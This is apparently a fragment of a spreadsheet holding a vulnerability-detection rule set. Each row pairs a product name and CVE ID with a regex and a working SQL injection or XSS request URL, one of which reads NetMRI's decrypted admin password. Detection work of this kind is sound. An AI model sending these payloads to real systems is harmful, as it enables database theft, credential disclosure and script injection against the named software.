    <t>.*?(?:/wp-json/h5vp/v1/video/0\?id='\+union all select concat\(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5\(.*?\)\),2,3,4,5,6,7,8- -).*</t>
  </si>
  <si>
    <t>/wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8- -</t>
  </si>
  <si>
    <t>IdeaCMS</t>
  </si>
  <si>
    <t>CVE-2025-5569</t>
  </si>
  <si>
    <t>.*?(?:/api/v1\.index\.goods/getList\.html\?field=id,md5\(.*?\)&amp;activity_type=hot&amp;time_stamp=1781864476|/api/v1\.index\.article/getList\.html\?field=id,md5\(.*?\)&amp;size=1&amp;cat=3&amp;time_stamp=1781864476).*</t>
  </si>
  <si>
    <t>/api/v1.index.article/getList.html?field=id,md5({{num}})&amp;size=1&amp;cat=3&amp;time_stamp=1781864476|/api/v1.index.goods/getList.html?field=id,md5({{num}})&amp;activity_type=hot&amp;time_stamp=1781864476</t>
  </si>
  <si>
    <t>NetMRI</t>
  </si>
  <si>
    <t>CVE-2025-32814</t>
  </si>
  <si>
    <t>.*?(?:/netmri/config/userAdmin/login\.tdf\?skipjackUsername=admin%22\+AND\+updatexml\(rand\(\),concat\(CHAR\(126\),NetmriDecrypt\(\(select%20PasswordSecure%20from%20skipjack\.ACLUser%20where%20UserName=%22admin%22\),%22password%22,1\),CHAR\(126\)\),null\)--%22&amp;skipjackPassword=anything&amp;weakPassword=true&amp;eulaAccepted=Accept&amp;mode=DO-LOGIN).*</t>
  </si>
  <si>
    <t>/netmri/config/userAdmin/login.tdf?skipjackUsername=admin%22+AND+updatexml(rand(),concat(CHAR(126),NetmriDecrypt((select%20PasswordSecure%20from%20skipjack.ACLUser%20where%20UserName=%22admin%22),%22password%22,1),CHAR(126)),null)--%22&amp;skipjackPassword=anything&amp;weakPassword=true&amp;eulaAccepted=Accept&amp;mode=DO-LOGIN</t>
  </si>
  <si>
    <t>Slider &amp; Popup Builder</t>
  </si>
  <si>
    <t>CVE-2025-2011</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin/admin-ajax\.php\?s=9999'\)union\+select\+111,222,\(select\(concat\(0x44617461626173653a20,database\(\)\)\)\),4444,\+5--\+-&amp;perpage=20&amp;page=1&amp;orderBy=source_id&amp;dateEnd=&amp;dateStart=&amp;order=DESC&amp;sources=&amp;action=depicter-lead-index).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?s=9999')union+select+111,222,(select(concat(0x44617461626173653a20,database()))),4444,+5--+-&amp;perpage=20&amp;page=1&amp;orderBy=source_id&amp;dateEnd=&amp;dateStart=&amp;order=DESC&amp;sources=&amp;action=depicter-lead-index</t>
  </si>
  <si>
    <t>.*?(?:/member/ajax_membergroup\.php\?action=post&amp;membergroup=@`'`/\*!50000Union\+\*/\+/\*!50000select\+\*/\+md5\(.*?\)\+--\+@`'`).*</t>
  </si>
  <si>
    <t>/member/ajax_membergroup.php?action=post&amp;membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{num}})+--+@`'`</t>
  </si>
  <si>
    <t>帆软</t>
  </si>
  <si>
    <t>.*?(?:/webroot/decision/view/ReportServer\?.*?=&amp;n=\$\{sum\(1024,123\)\}).*</t>
  </si>
  <si>
    <t>/webroot/decision/view/ReportServer?{{string}}=&amp;n=${sum(1024,123)}</t>
  </si>
  <si>
    <t>.*?(?:/w_selfservice/oauthservlet/%2e\./\.%2e/servlet/sduty/getSdutyTree\?param=child&amp;target=1&amp;codesetid=1&amp;codeitemid=1%27\+UNION\+ALL\+SELECT\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--\+Iprd).*</t>
  </si>
  <si>
    <t>/w_selfservice/oauthservlet/%2e./.%2e/servlet/sduty/getSdutyTree?param=child&amp;target=1&amp;codesetid=1&amp;codeitemid=1%27+UNION+ALL+SELECT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--+Iprd</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_oscommerce&amp;osMod=mshop_pl_src&amp;manufacturers_id=7&amp;sort=products_sort_order&amp;page=index\.php&amp;format=xml&amp;task=showproducts&amp;view=med&amp;sort=latest&amp;sortdir=%27).*</t>
  </si>
  <si>
    <t>/index.php?option=com_oscommerce&amp;osMod=mshop_pl_src&amp;manufacturers_id=7&amp;sort=products_sort_order&amp;page=index.php&amp;format=xml&amp;task=showproducts&amp;view=med&amp;sort=latest&amp;sortdir=%27</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_departments&amp;id=-1%20UNION%20SELECT%201,md5\(.*?\),3,4,5,6,7,8--).*</t>
  </si>
  <si>
    <t>/index.php?option=com_departments&amp;id=-1%20UNION%20SELECT%201,md5({{num}}),3,4,5,6,7,8--</t>
  </si>
  <si>
    <t>蓝凌</t>
  </si>
  <si>
    <t>.*?(?:/SM/rpt_listreport_definefield\.aspx\?ID=2%20and%201=@@version--\+).*</t>
  </si>
  <si>
    <t>/SM/rpt_listreport_definefield.aspx?ID=2%20and%201=@@version--+</t>
  </si>
  <si>
    <t>AeroCMS</t>
  </si>
  <si>
    <t>.*?(?:/cms/author_posts\.php\?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT\(md5\(.*?\),1,1\),NULL,NULL,NULL,NULL--%20-&amp;p_id=1|/author_posts\.php\?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT\(md5\(.*?\),1,1\),NULL,NULL,NULL,NULL--%20-&amp;p_id=1).*</t>
  </si>
  <si>
    <t>/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&amp;p_id=1|/cms/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&amp;p_id=1</t>
  </si>
  <si>
    <t>DotnetCMS</t>
  </si>
  <si>
    <t>.*?(?:/user/City_ajax\.aspx\?CityId=33'union%20select%20sys\.fn_sqlvarbasetostr\(HashBytes\('MD5','.*?'\)\),2--).*</t>
  </si>
  <si>
    <t>/user/City_ajax.aspx?CityId=33'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','{{randstr}}')),2--</t>
  </si>
  <si>
    <t>多米CMS</t>
  </si>
  <si>
    <t>.*?(?:/duomiphp/ajax\.php\?action=addfav&amp;id=1&amp;uid=1%20and%20extractvalue\(1,concat_ws\(1,1,md5\(.*?\)\)\)).*</t>
  </si>
  <si>
    <t>/duomiphp/ajax.php?action=addfav&amp;id=1&amp;uid=1%20and%20extractvalue(1,concat_ws(1,1,md5({{num}})))</t>
  </si>
  <si>
    <t>ECTouch</t>
  </si>
  <si>
    <t>.*?(?:/upload/mobile/index\.php\?c=category&amp;a=asynclist&amp;price_max=1\.0%20AND%20\(SELECT%201%20FROM\(SELECT%20COUNT\(\*\),CONCAT\(0x7e,md5\(.*?\),0x7e,FLOOR\(RAND\(0\)\*2\)\)x%20FROM%20INFORMATION_SCHEMA\.CHARACTER_SETS%20GROUP%20BY%20x\)a\)'').*</t>
  </si>
  <si>
    <t>/upload/mobile/index.php?c=category&amp;a=asynclist&amp;price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5({{num}}),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''</t>
  </si>
  <si>
    <t>FineCMS</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?c=api&amp;m=data2&amp;auth=582f27d140497a9d8f048ca085b111df&amp;param=action=sql%20sql=%27select%20md5\(.*?\)%27).*</t>
  </si>
  <si>
    <t>/index.php?c=api&amp;m=data2&amp;auth=582f27d140497a9d8f048ca085b111df&amp;param=action=sql%20sql=%27select%20md5({{num}})%27</t>
  </si>
  <si>
    <t>Fumasoft Cloud</t>
  </si>
  <si>
    <t>.*?(?:/Ajax/AjaxMethod\.ashx\?action=getEmpByname&amp;Name=Y'\+union\+select\+substring\(sys\.fn_sqlvarbasetostr\(HASHBYTES\('MD5','.*?'\)\),3,32\)--).*</t>
  </si>
  <si>
    <t>/Ajax/AjaxMethod.ashx?action=getEmpByname&amp;Name=Y'+union+select+substring(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','{{num}}')),3,32)--</t>
  </si>
  <si>
    <t>JeePlusCMS</t>
  </si>
  <si>
    <t>.*?(?:/a/sys/user/resetPassword\?mobile=13588888888%27and%20\(updatexml\(1,concat\(0x7e,\(select%20md5\(.*?\)\),0x7e\),1\)\)%23).*</t>
  </si>
  <si>
    <t>/a/sys/user/resetPassword?mobile=13588888888%27and%20(updatexml(1,concat(0x7e,(select%20md5({{num}})),0x7e),1))%23</t>
  </si>
  <si>
    <t>PHPOK</t>
  </si>
  <si>
    <t>.*?(?:/api\.php\?c=project&amp;f=index&amp;token=1234&amp;id=news&amp;sort=1 and extractvalue\(1,concat\(0x7e,md5\(.*?\)\)\) --\+).*</t>
  </si>
  <si>
    <t>/api.php?c=project&amp;f=index&amp;token=1234&amp;id=news&amp;sort=1 and extractvalue(1,concat(0x7e,md5({{num}}))) --+</t>
  </si>
  <si>
    <t>Phuket SolutionCMS</t>
  </si>
  <si>
    <t>.*?(?:/properties-list\.php\?property-types=%27|/properties-list\.php).*</t>
  </si>
  <si>
    <t>/properties-list.php?property-types=%27|/properties-list.php</t>
  </si>
  <si>
    <t>海洋CMS</t>
  </si>
  <si>
    <t>.*?(?:/comment/api/index\.php\?gid=1&amp;page=2&amp;rlist\[\]=@`%27`,%20extractvalue\(1,%20concat_ws\(0x20,%200x5c,\(select%20md5\(.*?\)\)\)\),@`%27`).*</t>
  </si>
  <si>
    <t>/comment/api/index.php?gid=1&amp;page=2&amp;rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5({{num}})))),@`%27`</t>
  </si>
  <si>
    <t>五指CMS</t>
  </si>
  <si>
    <t>.*?(?:/api/sms_check\.php\?param=1%27%20and%20updatexml\(1,concat\(0x7e,\(SELECT%20md5\(.*?\)\),0x7e\),1\)--%20).*</t>
  </si>
  <si>
    <t>/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20md5({{num}})),0x7e),1)--%20</t>
  </si>
  <si>
    <t>Xhibiter NFT Marketplace</t>
  </si>
  <si>
    <t xml:space="preserve">.*?(?:/collections\?id=2'\+AND\+\(SELECT\+1492\+FROM\+\(SELECT\(SLEEP\(7\)\)\)HsLV\)\+AND\+'KEOa'='KEOa </t>
  </si>
  <si>
    <t>/|/collections?id=2'+AND+(SELECT+1492+FROM+(SELECT(SLEEP(7)))HsLV)+AND+'KEOa'='KEOa</t>
  </si>
  <si>
    <t>YesWiki</t>
  </si>
  <si>
    <t>.*?(?:/\?PagePrincipale/rss&amp;id=1%27\+and\+extractvalue\(0x0a,concat\(0x0a,\(select\+concat_ws\(0x207c20,md5\(.*?\),1,user\(\)\)\)\)\)--\+-).*</t>
  </si>
  <si>
    <t>/?PagePrincipale/rss&amp;id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,md5({{num}}),1,user()))))--+-</t>
  </si>
  <si>
    <t>ZZZCMS</t>
  </si>
  <si>
    <t>.*?(?:/admin/cms_channel\.php\?del=123456\+AND\+\(SELECT\+1\+FROM\(SELECT\+COUNT\(\*\)%2cCONCAT\(0x7e%2cmd5\(.*?\)%2c0x7e%2cFLOOR\(RAND\(0\)\*2\)\)x\+FROM\+INFORMATION_SCHEMA\.CHARACTER_SETS\+GROUP\+BY\+x\)a\)--%2b').*</t>
  </si>
  <si>
    <t>/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5({{num}})%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'</t>
  </si>
  <si>
    <t>致翔</t>
  </si>
  <si>
    <t>.*?(?:/mainpage/msglog\.aspx\?user=1%27%20and%201=convert\(int,\(select%20sys\.fn_sqlvarbasetostr\(HashBytes\(%27MD5%27,%27127381%27\)\)\)\)--).*</t>
  </si>
  <si>
    <t>/mainpage/msglog.aspx?user=1%27%20and%201=convert(int,(select%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27127381%27))))--</t>
  </si>
  <si>
    <t>致远OA</t>
  </si>
  <si>
    <t>.*?(?:/yyoa/ext/trafaxserver/ExtnoManage/setextno\.jsp\?user_ids=\(99999\)\+union\+all\+select\+1,2,\(md5\(.*?\)\),4#).*</t>
  </si>
  <si>
    <t>/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999)+union+all+select+1,2,(md5({{num}})),4#</t>
  </si>
  <si>
    <t>ShiziyuCMS Api Controller</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?s=api/goods_detail&amp;goods_id=1%20and%20updatexml\(1,concat\(0x7e,md5\(.*?\),0x7e\),1\)).*</t>
  </si>
  <si>
    <t>/index.php?s=api/goods_detail&amp;goods_id=1%20and%20updatexml(1,concat(0x7e,md5({{num}}),0x7e),1)</t>
  </si>
  <si>
    <t>Arcade</t>
  </si>
  <si>
    <t>.*?(?:/arcade\.php\?act=Arcade&amp;do=stats&amp;comment=a&amp;s_id=1').*</t>
  </si>
  <si>
    <t>/arcade.php?act=Arcade&amp;do=stats&amp;comment=a&amp;s_id=1'</t>
  </si>
  <si>
    <t>泛微</t>
  </si>
  <si>
    <t>.*?(?:/js/hrm/getdata\.jsp\?cmd=getSelectAllId&amp;sql=select\+547653\*865674\+as\+id).*</t>
  </si>
  <si>
    <t>/js/hrm/getdata.jsp?cmd=getSelectAllId&amp;sql=select+547653*865674+as+id</t>
  </si>
  <si>
    <t>.*?(?:/mobile/plugin/SyncUserInfo\.jsp\?userIdentifiers=-1\)union\(select\(3\),null,null,null,null,null,str\(98989\*44313\),null).*</t>
  </si>
  <si>
    <t>/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null</t>
  </si>
  <si>
    <t>.*?(?:/pweb/careerapply/HrmCareerApplyPerView\.jsp\?id=1%20union%20select%201,2,sys\.fn_sqlvarbasetostr\(HashBytes\('MD5','.*?'\)\),4,5,6,7).*|.*?(?:/Api/portal/elementEcodeAddon/getSqlData\?sql=select%20substring\(sys\.fn_sqlvarbasetostr\(hashbytes\('MD5','.*?'\)\),3,32\)|/Api/portal/elementEcodeAddon/getSqlData\?sql=).*</t>
  </si>
  <si>
    <t>/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','{{num}}')),4,5,6,7|/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)|/Api/portal/elementEcodeAddon/getSqlData?sql=</t>
  </si>
  <si>
    <t>用友</t>
  </si>
  <si>
    <t>.*?(?:/config/fillbacksettingedit\.php\?DontCheckLogin=1&amp;action=edit&amp;id=1\+UNION\+ALL\+SELECT\+NULL,NULL,NULL,NULL,@@VERSION,NULL,NULL--\+).*</t>
  </si>
  <si>
    <t>/config/fillbacksettingedit.php?DontCheckLogin=1&amp;action=edit&amp;id=1+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,@@VERSION,NULL,NULL--+</t>
  </si>
  <si>
    <t>.*?(?:/common/dept\.jsp\?deptid=1'\+UNION\+ALL\+SELECT\+60%2Csys\.fn_sqlvarbasetostr\(HASHBYTES\('MD5'%2C'.*?'\)\)--\+).*</t>
  </si>
  <si>
    <t>/common/dept.jsp?deptid=1'+UNION+ALL+SELECT+60%2Csys.fn_sqlvarbasetostr(HASHBYTES('MD5'%2C'{{num}}'))--+</t>
  </si>
  <si>
    <t>.*?(?:/yyoa/common/js/menu/test\.jsp\?doType=101&amp;S1=\(SELECT%20md5\(.*?\)\)).*</t>
  </si>
  <si>
    <t>/yyoa/common/js/menu/test.jsp?doType=101&amp;S1=(SELECT%20md5({{num}}))</t>
  </si>
  <si>
    <t>SolarWinds Orion</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t>.*?(?:/SolarWinds/InformationService/v3/Json/Query\?query=SELECT\+Uri\+FROM\+Orion\.Pollers\+ORDER\+BY\+PollerID\+WITH\+ROWS\+1\+TO\+3\+WITH\+TOTALROWS|/InformationService/v3/Json/Query\?query=SELECT\+Uri\+FROM\+Orion\.Pollers\+ORDER\+BY\+PollerID\+WITH\+ROWS\+1\+TO\+3\+WITH\+TOTALROWS).*</t>
  </si>
  <si>
    <t>/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS|/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS</t>
  </si>
  <si>
    <t>FortiWeb</t>
  </si>
  <si>
    <t>跨站脚本</t>
  </si>
  <si>
    <t>CVE-2021-22122</t>
  </si>
  <si>
    <t>.*?(?:/omni_success\?cmdb_edit_path="\);alert\('document\.domain'\);//|/error3\?msg=30&amp;data=';alert\('document\.domain'\);//).*</t>
  </si>
  <si>
    <t>/omni_success?cmdb_edit_path=");alert('document.domain');//|/error3?msg=30&amp;data=';alert('document.domain');//</t>
  </si>
  <si>
    <t>Helmet Store Showroom</t>
  </si>
  <si>
    <t>CVE-2022-46073</t>
  </si>
  <si>
    <t>.*?(?:/hss/\?q=%27%3E%3Cscript%3Ealert\(document\.domain\)%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>ReQlogic</t>
  </si>
  <si>
    <t>CVE-2022-41441</t>
  </si>
  <si>
    <t>.*?(?:/ProcessWait\.aspx\?POBatch=test&amp;WaitDuration=&lt;/script&gt;&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;|/ProcessWait\.aspx\?POBatch=&lt;/script&gt;&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;&amp;WaitDuration=3).*</t>
  </si>
  <si>
    <t>/ProcessWait.aspx?POBatch=&lt;/script&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;&amp;WaitDuration=3|/ProcessWait.aspx?POBatch=test&amp;WaitDuration=&lt;/script&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;</t>
  </si>
  <si>
    <t>CVE-2022-1933</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin/admin-ajax\.php\?action=cdi_collect_follow&amp;trk=%3Cscript%3Ealert\(document\.domain\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?action=cdi_collect_follow&amp;trk=%3Cscript%3Ealert(document.domain)%3C/script%3E</t>
  </si>
  <si>
    <t>Zimbra Collaboration (ZCS)</t>
  </si>
  <si>
    <t>CVE-2022-27926</t>
  </si>
  <si>
    <t>.*?(?:/public/error\.jsp\?errCode=%22%3E%3Cimg%20src=x%20onerror=alert\(document\.domain\)%3E).*</t>
  </si>
  <si>
    <t>/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E</t>
  </si>
  <si>
    <t>CopyParty</t>
  </si>
  <si>
    <t>CVE-2023-38501</t>
  </si>
  <si>
    <t>.*?(?:/\?k304=y%0D%0A%0D%0A%3Cimg\+src%3Dcopyparty\+onerror%3Dalert\(document\.domain\)%3E).*</t>
  </si>
  <si>
    <t>/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E</t>
  </si>
  <si>
    <t>IceWarp</t>
  </si>
  <si>
    <t>CVE-2023-39598</t>
  </si>
  <si>
    <t>.*?(?:/webmail/\?mid=.*?"&gt;&lt;img src=x onerror=confirm\(document\.domain\)&gt;).*</t>
  </si>
  <si>
    <t>/webmail/?mid={{to_lower(rand_base(4))}}"&gt;&lt;img src=x onerror=confirm(document.domain)&gt;</t>
  </si>
  <si>
    <t>CVE-2023-37728</t>
  </si>
  <si>
    <t>.*?(?:/webmail/\?color=%22%3e%3cimg%20src%20onerror%3dalert\(document\.domain\)%3e%3c%22%27|/\?color=%22%3e%3cimg%20src%20onerror%3dalert\(document\.domain\)%3e%3c%22%27).*</t>
  </si>
  <si>
    <t>/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27|/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27</t>
  </si>
  <si>
    <t>Imgproxy</t>
  </si>
  <si>
    <t>CVE-2023-1496</t>
  </si>
  <si>
    <t>.*?(?:/unsafe/plain/https://cve-2023-1496\.s3\.amazonaws\.com/imgproxy_xss\.svg).*</t>
  </si>
  <si>
    <t>/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg</t>
  </si>
  <si>
    <t>OURPHP</t>
  </si>
  <si>
    <t>CVE-2023-30210</t>
  </si>
  <si>
    <t>.*?(?:/client/manage/ourphp_tz\.php\?act=rt&amp;callback=&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;).*\|.*?(?:/client/manage/ourphp_out\.php\?ourphp_admin=logout&amp;out=&lt;/script&gt;&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/client/manage/ourphp_tz.php?act=rt&amp;callback=&lt;script&gt;alert(document.domain)&lt;/script&gt;\|/client/manage/ourphp_out.php?ourphp_admin=logout&amp;out=&lt;/script&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;</t>
  </si>
  <si>
    <t>CVE-2023-4114</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?controller=pjFront&amp;action=pjActionSearch&amp;session_id=&amp;locale=1&amp;index=%22%3E%3Cscript%3Ealert\(document\.domain\)%3C/script%3E&amp;date=).*</t>
  </si>
  <si>
    <t>/index.php?controller=pjFront&amp;action=pjActionSearch&amp;session_id=&amp;locale=1&amp;index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&amp;date=</t>
  </si>
  <si>
    <t>CVE-2023-4113</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?controller=pjFrontPublic&amp;action=pjActionServices&amp;locale=1&amp;index=%22%3E%3Cscript%3Ealert\(document\.domain\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/index.php?controller=pjFrontPublic&amp;action=pjActionServices&amp;locale=1&amp;index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E</t>
  </si>
  <si>
    <t>CVE-2023-4112</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/gm5rj%22%3E%3Cscript%3Ealert\(document\.domain\)%3C/script%3Ebwude\?controller=pjAdmin&amp;action=pjActionLogin&amp;err=1).*</t>
  </si>
  <si>
    <t>/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&amp;action=pjActionLogin&amp;err=1</t>
  </si>
  <si>
    <t>CVE-2023-4116</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?controller=pjFrontPublic&amp;action=pjActionSearch&amp;locale=1&amp;index=%22%3E%3Cscript%3Ealert\(document\.domain\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/index.php?controller=pjFrontPublic&amp;action=pjActionSearch&amp;locale=1&amp;index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E</t>
  </si>
  <si>
    <t>CVE-2023-39676</t>
  </si>
  <si>
    <t>.*?(?:/modules/fieldpopupnewsletter/ajax\.php\?callback=%3Cscript%3Ealert\(document\.domain\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E</t>
  </si>
  <si>
    <t>ShortPixel Adaptive Images</t>
  </si>
  <si>
    <t>CVE-2023-0334</t>
  </si>
  <si>
    <t>.*?(?:/\?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert\(document\.domain\)%3E).*</t>
  </si>
  <si>
    <t>/?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E</t>
  </si>
  <si>
    <t>mooSocial</t>
  </si>
  <si>
    <t>CVE-2023-4174</t>
  </si>
  <si>
    <t>.*?(?:/stores"&gt;&lt;img\+src=a\+onerror=alert\(document\.domain\)&gt;ridxm/all-products\?store_id=&amp;keyword=&amp;price_from=&amp;price_to=&amp;rating=&amp;store_category_id=&amp;sortby=most_recent|/faqs"&gt;&lt;img\+src=a\+onerror=alert\(document\.domain\)&gt;ridxm/index\?content_search="&gt;&lt;img\+src=a\+onerror=alert\(document\.domain\)&gt;ridxm|/classifieds"&gt;&lt;img\+src=a\+onerror=alert\(document\.domain\)&gt;ridxm/search\?category=1|/user_info"&gt;&lt;img\+src=a\+onerror=alert\(document\.domain\)&gt;ridxm/index/friends|/search/index\?q="&gt;&lt;img\+src=a\+onerror=alert\(document\.domain\)&gt;ridxm).*|.*?(?:/classified/%22%3E%3Cimg%20src=a%20onerror=alert\('document\.domain'\)%3E/search\?category=1).*</t>
  </si>
  <si>
    <t>/stores"&gt;&lt;img+src=a+onerror=alert(document.domain)&gt;ridxm/all-products?store_id=&amp;keyword=&amp;price_from=&amp;price_to=&amp;rating=&amp;store_category_id=&amp;sortby=most_recent|/faqs"&gt;&lt;img+src=a+onerror=alert(document.domain)&gt;ridxm/index?content_search="&gt;&lt;img+src=a+onerror=alert(document.domain)&gt;ridxm|/search/index?q="&gt;&lt;img+src=a+onerror=alert(document.domain)&gt;ridxm|/user_info"&gt;&lt;img+src=a+onerror=alert(document.domain)&gt;ridxm/index/friends|/classifieds"&gt;&lt;img+src=a+onerror=alert(document.domain)&gt;ridxm/search?category=1|/classified/%22%3E%3Cimg%20src=a%20onerror=alert('document.domain')%3E/search?category=1</t>
  </si>
  <si>
    <t>Calibre</t>
  </si>
  <si>
    <t>CVE-2024-7008</t>
  </si>
  <si>
    <t>.*?(?:/browse/book/TEST&amp;quot;;window\.stop\(\);alert\(document\.domain\);%2f%2f).*</t>
  </si>
  <si>
    <t>/browse/book/TEST&amp;quot;;window.stop();alert(document.domain);%2f%2f</t>
  </si>
  <si>
    <t>Journyx</t>
  </si>
  <si>
    <t>CVE-2024-6892</t>
  </si>
  <si>
    <t>.*?(?:/jtcgi/r/adlogin/sso\?code=1337&amp;state=foobar&amp;id_token=zoinks&amp;error_description=%3Csvg%2fonload%3dprompt\(%27document\.domain%27\)%3E&amp;error=error).*</t>
  </si>
  <si>
    <t>/jtcgi/r/adlogin/sso?code=1337&amp;state=foobar&amp;id_token=zoinks&amp;error_description=%3Csvg%2fonload%3dprompt(%27document.domain%27)%3E&amp;error=error</t>
  </si>
  <si>
    <t>CVE-2025-2127</t>
  </si>
  <si>
    <t>.*?(?:/extensions/realestate/index\.php/properties/list/list-with-sidebar/realties\?option=com_jux_real_estate&amp;view=realties&amp;Itemid=148&amp;title=&amp;price_slider_lower=63752&amp;price_slider_upper=400000&amp;area_slider_lower=30&amp;area_slider_upper=400&amp;type_id=2&amp;cat_id=8&amp;country_id=73&amp;locstate=187&amp;beds=1&amp;agent_id=112&amp;baths=1&amp;jp_yearbuilt=mzbpj%22%3e%3cscript%3ealert\(document\.domain\)%3c%2fscript%3eflmo8&amp;button=Search|/extensions/realestate/index\.php/properties/list/list-with-sidebar/realties\?option=com_jux_real_estate&amp;view=realties&amp;Itemid=6wdv%22%3E%3Cscript%3Ealert\(document\.domain\)%3C/script%3Ewz8nu&amp;title=&amp;price_slider_lower=63752&amp;price_slider_upper=400000&amp;area_slider_lower=30&amp;area_slider_upper=400&amp;type_id=2&amp;cat_id=8&amp;country_id=73&amp;locstate=187&amp;beds=1&amp;agent_id=112&amp;baths=1&amp;jp_yearbuilt=&amp;button=Search).*</t>
  </si>
  <si>
    <t>/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&amp;view=realties&amp;Itemid=6wdv%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ewz8nu&amp;title=&amp;price_slider_lower=63752&amp;price_slider_upper=400000&amp;area_slider_lower=30&amp;area_slider_upper=400&amp;type_id=2&amp;cat_id=8&amp;country_id=73&amp;locstate=187&amp;beds=1&amp;agent_id=112&amp;baths=1&amp;jp_yearbuilt=&amp;button=Search|/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&amp;view=realties&amp;Itemid=148&amp;title=&amp;price_slider_lower=63752&amp;price_slider_upper=400000&amp;area_slider_lower=30&amp;area_slider_upper=400&amp;type_id=2&amp;cat_id=8&amp;country_id=73&amp;locstate=187&amp;beds=1&amp;agent_id=112&amp;baths=1&amp;jp_yearbuilt=mzbpj%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3eflmo8&amp;button=Search</t>
  </si>
  <si>
    <t>.*?(?:/properties-list\.php\?property-types=1&amp;types=2&amp;location=&amp;prices=&amp;bedroom=&amp;code=%22%3E%3Cscript%3Ealert\(document\.domain\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/properties-list.php?property-types=1&amp;types=2&amp;location=&amp;prices=&amp;bedroom=&amp;code=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E</t>
  </si>
  <si>
